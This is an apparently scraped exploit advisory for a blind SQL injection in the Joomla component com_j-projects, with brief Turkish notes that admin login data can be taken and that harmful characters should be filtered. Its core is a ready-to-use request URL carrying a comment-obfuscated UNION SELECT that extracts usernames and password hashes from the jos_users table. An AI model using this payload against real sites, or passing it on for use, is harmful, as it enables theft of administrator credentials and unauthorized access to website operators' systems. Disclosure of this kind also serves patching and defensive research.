31 lines
No EOL
822 B
Text
31 lines
No EOL
822 B
Text
<------------------- header data start ------------------- >
|
|
|
|
#############################################################
|
|
# Joomla Component com_j-projects Blind SQL Injection Vulnerability
|
|
#############################################################
|
|
|
|
# Author : Pyske
|
|
|
|
|
|
# Name : com_j-projects
|
|
|
|
|
|
# Bug Type : Blind SQL Injection
|
|
|
|
|
|
# Infection : Admin login bilgileri al?nabilir.
|
|
|
|
|
|
|
|
|
|
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
|
|
|
|
#############################################################
|
|
|
|
< ------------------- header data end of ------------------- >
|
|
|
|
< -- bug code start -- >
|
|
|
|
path /index.php?option=com_j-projects&Itemid=102&cat=5&task=projects&project=30/**/and/**/1=0/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users
|
|
|
|
< -- bug code end of -- > |